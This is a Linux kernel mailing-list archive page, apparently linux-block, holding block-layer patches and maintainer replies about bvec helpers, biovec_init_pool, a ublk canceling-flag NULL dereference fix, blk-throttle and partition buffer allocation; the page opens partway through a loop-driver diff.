+			nr_bvec, blk_rq_bytes(rq));
+		iter.iov_offset = rq->bio->bi_iter.bi_bvec_done;
 	}
 	atomic_set(&cmd->ref, 2);
 
-	iov_iter_bvec(&iter, rw, bvec, nr_bvec, blk_rq_bytes(rq));
-	iter.iov_offset = offset;
-
 	cmd->iocb.ki_pos = pos;
 	cmd->iocb.ki_filp = file;
 	cmd->iocb.ki_ioprio = req_get_ioprio(rq);
-- 
2.53.0


^ permalink raw reply related

* clean up bvec iter helpers
From: Christoph Hellwig @ 2026-05-27 15:10 UTC (permalink / raw)
  To: Jens Axboe
  Cc: Keith Busch, Sagi Grimberg, Ming Lei, Bart Van Assche,
	Caleb Sander Mateos, linux-block, linux-nvme

Hi all,

this series converts the bvec_iter helpers from macros to inline
functions, and to facilitate that cleans up a little bit of code
in the loop and nvme-tcp drivers first.

Diffstat:
 drivers/block/loop.c    |   24 ++++-------
 drivers/nvme/host/tcp.c |   27 ++++--------
 include/linux/bvec.h    |  101 ++++++++++++++++++++++++++++++------------------
 3 files changed, 84 insertions(+), 68 deletions(-)

^ permalink raw reply

* [PATCH] block: mark biovec_init_pool static
From: Christoph Hellwig @ 2026-05-27 15:06 UTC (permalink / raw)
  To: axboe; +Cc: linux-block

Signed-off-by: Christoph Hellwig <hch@lst.de>
---
 block/bio.c         | 2 +-
 include/linux/bio.h | 1 -
 2 files changed, 1 insertion(+), 2 deletions(-)

diff --git a/block/bio.c b/block/bio.c
index 2d880d1255fe..e9944dab0132 100644
--- a/block/bio.c
+++ b/block/bio.c
@@ -1873,7 +1873,7 @@ EXPORT_SYMBOL_GPL(bio_trim);
  * create memory pools for biovec's in a bio_set.
  * use the global biovec slabs created for general use.
  */
-int biovec_init_pool(mempool_t *pool, int pool_entries)
+static int biovec_init_pool(mempool_t *pool, int pool_entries)
 {
 	struct biovec_slab *bp = bvec_slabs + ARRAY_SIZE(bvec_slabs) - 1;
 
diff --git a/include/linux/bio.h b/include/linux/bio.h
index 7597ae4dc52b..e60d2f5bd3dc 100644
--- a/include/linux/bio.h
+++ b/include/linux/bio.h
@@ -347,7 +347,6 @@ enum {
 };
 extern int bioset_init(struct bio_set *, unsigned int, unsigned int, int flags);
 extern void bioset_exit(struct bio_set *);
-extern int biovec_init_pool(mempool_t *pool, int pool_entries);
 
 struct bio *bio_alloc_bioset(struct block_device *bdev, unsigned short nr_vecs,
 			     blk_opf_t opf, gfp_t gfp, struct bio_set *bs);
-- 
2.53.0


^ permalink raw reply related

* Re: [PATCH] ublk: set canceling flag even when disk is not allocated
From: Jens Axboe @ 2026-05-27 15:03 UTC (permalink / raw)
  To: linux-block, Ming Lei; +Cc: Caleb Sander Mateos, Uday Shankar
In-Reply-To: <20260527144042.2095194-1-tom.leiming@gmail.com>


On Wed, 27 May 2026 09:40:42 -0500, Ming Lei wrote:
> ublk_start_cancel() previously bailed out early when ublk_get_disk()
> returned NULL, treating it as "our disk has been dead".  That is correct
> for the post-teardown case, but it also wrongly covers the pre-start
> case: ublk_ctrl_start_dev() has not assigned ub->ub_disk yet, while
> io_uring is already tearing down the daemon's uring_cmds via
> ublk_uring_cmd_cancel_fn().
> 
> [...]

Applied, thanks!

[1/1] ublk: set canceling flag even when disk is not allocated
      commit: 1133b93fc7f63defaa2c07d5f49873c14bb74681

Best regards,
-- 
Jens Axboe




^ permalink raw reply

* [PATCH] ublk: set canceling flag even when disk is not allocated
From: Ming Lei @ 2026-05-27 14:40 UTC (permalink / raw)
  To: Jens Axboe, linux-block; +Cc: Caleb Sander Mateos, Uday Shankar, Ming Lei

ublk_start_cancel() previously bailed out early when ublk_get_disk()
returned NULL, treating it as "our disk has been dead".  That is correct
for the post-teardown case, but it also wrongly covers the pre-start
case: ublk_ctrl_start_dev() has not assigned ub->ub_disk yet, while
io_uring is already tearing down the daemon's uring_cmds via
ublk_uring_cmd_cancel_fn().

In that window, the cancel path skips ublk_set_canceling(), so
ubq->canceling stays false, even though ublk_cancel_cmd() goes on to
NULL out every io->cmd.  ublk_ctrl_start_dev() then proceeds to set
ub->ub_disk, call add_disk(), and schedule partition_scan_work.  When
ublk_partition_scan_work() runs bdev_disk_changed() and the resulting
read reaches ublk_queue_rq() -> ublk_queue_cmd(), the ubq->canceling
check passes and the code dereferences the NULL io->cmd:

  BUG: kernel NULL pointer dereference, address: 0000000000000018
  RIP: ublk_queue_cmd drivers/block/ublk_drv.c [inline]
  RIP: ublk_queue_rq+0x73/0x100
  Call Trace:
   blk_mq_dispatch_rq_list+0x1c5/0xca0
   ...
   bdev_disk_changed+0x3d4/0x5e0
   ublk_partition_scan_work+0x89/0xe0
   process_one_work+0x344/0x8a0

Fix it by always setting ub->canceling / ubq->canceling under
cancel_mutex.  When the disk is allocated, keep the existing
quiesce/unquiesce dance so the flag is observed across the
ublk_queue_rq() barrier.  When the disk is not yet allocated, there is
no request_queue and ublk_queue_rq() cannot be running concurrently, so
simply flipping the flag is sufficient: any subsequent I/O - including
the partition scan started by ublk_ctrl_start_dev() - will see
canceling set and be aborted via __ublk_queue_rq_common().

Fixes: 7fc4da6a304b ("ublk: scan partition in async way")
Signed-off-by: Ming Lei <tom.leiming@gmail.com>
---
 drivers/block/ublk_drv.c | 32 ++++++++++++++++++--------------
 1 file changed, 18 insertions(+), 14 deletions(-)

diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
index a08593b9f862..4f6d9e652187 100644
--- a/drivers/block/ublk_drv.c
+++ b/drivers/block/ublk_drv.c
@@ -2727,23 +2727,27 @@ static void ublk_start_cancel(struct ublk_device *ub)
 {
 	struct gendisk *disk = ublk_get_disk(ub);

-	/* Our disk has been dead */
-	if (!disk)
-		return;
-
 	mutex_lock(&ub->cancel_mutex);
 	if (ub->canceling)
 		goto out;
-	/*
-	 * Now we are serialized with ublk_queue_rq()
-	 *
-	 * Make sure that ubq->canceling is set when queue is frozen,
-	 * because ublk_queue_rq() has to rely on this flag for avoiding to
-	 * touch completed uring_cmd
-	 */
-	blk_mq_quiesce_queue(disk->queue);
-	ublk_set_canceling(ub, true);
-	blk_mq_unquiesce_queue(disk->queue);
+
+	if (disk) {
+		/*
+		 * Quiesce to serialize with ublk_queue_rq(), ensuring
+		 * ubq->canceling is visible when the queue resumes.
+		 */
+		blk_mq_quiesce_queue(disk->queue);
+		ublk_set_canceling(ub, true);
+		blk_mq_unquiesce_queue(disk->queue);
+	} else {
+		/*
+		 * Disk not yet allocated by ublk_ctrl_start_dev(), so
+		 * there is no request queue and ublk_queue_rq() cannot
+		 * be running.  Just set the flag; if start_dev proceeds
+		 * later, new I/O will see canceling and be aborted.
+		 */
+		ublk_set_canceling(ub, true);
+	}
 out:
 	mutex_unlock(&ub->cancel_mutex);
 	ublk_put_disk(disk);
-- 
2.54.0

^ permalink raw reply related

* Re: [PATCH v2] blk-throttle: schedule parent dispatch in tg_flush_bios()
From: Jens Axboe @ 2026-05-27 14:38 UTC (permalink / raw)
  To: tj, josef, cgroups, Tao Cui; +Cc: linux-block, Shin'ichiro Kawasaki
In-Reply-To: <20260522091530.1901437-1-cuitao@kylinos.cn>


On Fri, 22 May 2026 17:15:30 +0800, Tao Cui wrote:
> tg_flush_bios() schedules pending_timer on the child tg's own
> service_queue, which causes throtl_pending_timer_fn() to dispatch from
> the child's pending_tree.  For leaf cgroups this tree is empty, so the
> timer fires and exits without dispatching the throttled bio.
> 
> The throttled bio sits in the parent's pending_tree with disptime set
> to jiffies (THROTL_TG_CANCELING zeroes all dispatch times), but the
> parent's timer is never explicitly rescheduled.  The bio only gets
> dispatched when the parent timer eventually fires at its previously
> scheduled expiry.
> 
> [...]

Applied, thanks!

[1/1] blk-throttle: schedule parent dispatch in tg_flush_bios()
      commit: 6235ea3f8b8ffca0333ade0863992f3cd69592ea

Best regards,
-- 
Jens Axboe




^ permalink raw reply

* Re: [PATCH] rust: block: mq: align init_request numa_node arg with C signature
From: Jens Axboe @ 2026-05-27 14:37 UTC (permalink / raw)
  To: Boqun Feng, Miguel Ojeda, Gary Guo, Björn Roy Baron,
	Benno Lossin, Alice Ryhl, Trevor Gross, Danilo Krummrich,
	Andreas Hindborg
  Cc: Mateusz Nowicki, linux-block, rust-for-linux, linux-kernel
In-Reply-To: <20260527-block-for-next-2026-05-26-2200-failure-v1-1-4865889e282c@kernel.org>


On Wed, 27 May 2026 11:18:09 +0200, Andreas Hindborg wrote:
> Commit b040a1a4523d ("block: switch numa_node to int in
> blk_mq_hw_ctx and init_request") changed the type of the
> `numa_node` argument of `blk_mq_ops::init_request` from
> `unsigned int` to `int`. Update the Rust callback signature to
> match, so that the function item can be coerced to the C fn
> pointer type stored in `blk_mq_ops`.
> 
> [...]

Applied, thanks!

[1/1] rust: block: mq: align init_request numa_node arg with C signature
      commit: 6b2f3e4970e48e70c10111366f59f908f2ea6f96

Best regards,
-- 
Jens Axboe




^ permalink raw reply

* Re: [PATCH v2] block: partitions: replace __get_free_page() with kmalloc()
From: Jens Axboe @ 2026-05-27 14:37 UTC (permalink / raw)
  To: Mike Rapoport (Microsoft)
  Cc: Christoph Hellwig, Hannes Reinecke, Matthew Wilcox,
	Vlastimil Babka, linux-block, linux-kernel, linux-mm
In-Reply-To: <20260527-block-v2-1-8e06f914c484@kernel.org>


On Wed, 27 May 2026 17:33:28 +0300, Mike Rapoport (Microsoft) wrote:
> check_partition() allocates a buffer to use as backing memory for
> seq_buf.
> 
> This buffer can be allocated with kmalloc() as there's nothing special
> about it to go directly to the page allocator.
> 
> kmalloc() provides a better API that does not require ugly casts and
> kfree() does not need to know the size of the freed object.
> 
> [...]

Applied, thanks!

[1/1] block: partitions: replace __get_free_page() with kmalloc()
      commit: 17d7492a50251d913ae7101f898cf30ede856cde

Best regards,
-- 
Jens Axboe




^ permalink raw reply

* [PATCH v2] block: partitions: replace __get_free_page() with kmalloc()
From: Mike Rapoport (Microsoft) @ 2026-05-27 14:33 UTC (permalink / raw)
  To: Jens Axboe
  Cc: Christoph Hellwig, Hannes Reinecke, Matthew Wilcox, Mike Rapoport,
	Vlastimil Babka, linux-block, linux-kernel, linux-mm

check_partition() allocates a buffer to use as backing memory for
seq_buf.

This buffer can be allocated with kmalloc() as there's nothing special
about it to go directly to the page allocator.

kmalloc() provides a better API that does not require ugly casts and
kfree() does not need to know the size of the freed object.

For a single allocation on the cold path the performance difference between
kmalloc() and __get_free_pages() is not measurable as both allocators take
an object/page from a per-CPU list for fast path allocations.

For the slow path the performance is anyway determined by the amount of
reclaim involved rather than by what allocator is used.

Replace use of __get_free_page() with kmalloc() and free_page() with
kfree().

Link: https://lore.kernel.org/all/635405e4-9423-4a25-a6e7-e03c8ea0bcbe@redhat.com
Signed-off-by: Mike Rapoport (Microsoft) <rppt@kernel.org>
---
This is a (tiny) part of a larger effort to replace page allocator calls
with kmalloc.

Also in git:
https://git.kernel.org/pub/scm/linux/kernel/git/rppt/linux.git gfp-to-kmalloc/block

Signed-off-by: Mike Rapoport <rppt@kernel.org>
---
v2 changes:
* reword changelog

To: Jens Axboe <axboe@kernel.dk>
Cc: linux-block@vger.kernel.org
Cc: linux-kernel@vger.kernel.org
v1: https://patch.msgid.link/20260520-block-v1-1-6463dc2cf042@kernel.org
---
 block/partitions/core.c | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/block/partitions/core.c b/block/partitions/core.c
index 5d5332ce586b..b5c59b79ca7c 100644
--- a/block/partitions/core.c
+++ b/block/partitions/core.c
@@ -124,7 +124,7 @@ static struct parsed_partitions *check_partition(struct gendisk *hd)
 	state = allocate_partitions(hd);
 	if (!state)
 		return NULL;
-	state->pp_buf.buffer = (char *)__get_free_page(GFP_KERNEL);
+	state->pp_buf.buffer = kmalloc(PAGE_SIZE, GFP_KERNEL);
 	if (!state->pp_buf.buffer) {
 		free_partitions(state);
 		return NULL;
@@ -154,7 +154,7 @@ static struct parsed_partitions *check_partition(struct gendisk *hd)
 	if (res > 0) {
 		printk(KERN_INFO "%s", seq_buf_str(&state->pp_buf));
 
-		free_page((unsigned long)state->pp_buf.buffer);
+		kfree(state->pp_buf.buffer);
 		return state;
 	}
 	if (state->access_beyond_eod)
@@ -170,7 +170,7 @@ static struct parsed_partitions *check_partition(struct gendisk *hd)
 		printk(KERN_INFO "%s", seq_buf_str(&state->pp_buf));
 	}
 
-	free_page((unsigned long)state->pp_buf.buffer);
+	kfree(state->pp_buf.buffer);
 	free_partitions(state);
 	return ERR_PTR(res);
 }

---
base-commit: 5d6919055dec134de3c40167a490f33c74c12581
change-id: 20260520-block-25582753fd38

Best regards,
--  
Sincerely yours,
Mike.


^ permalink raw reply related

page: next (older) | prev (newer) | latest
- recent:[subjects (threaded)|topics (new)|topics (active)]

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox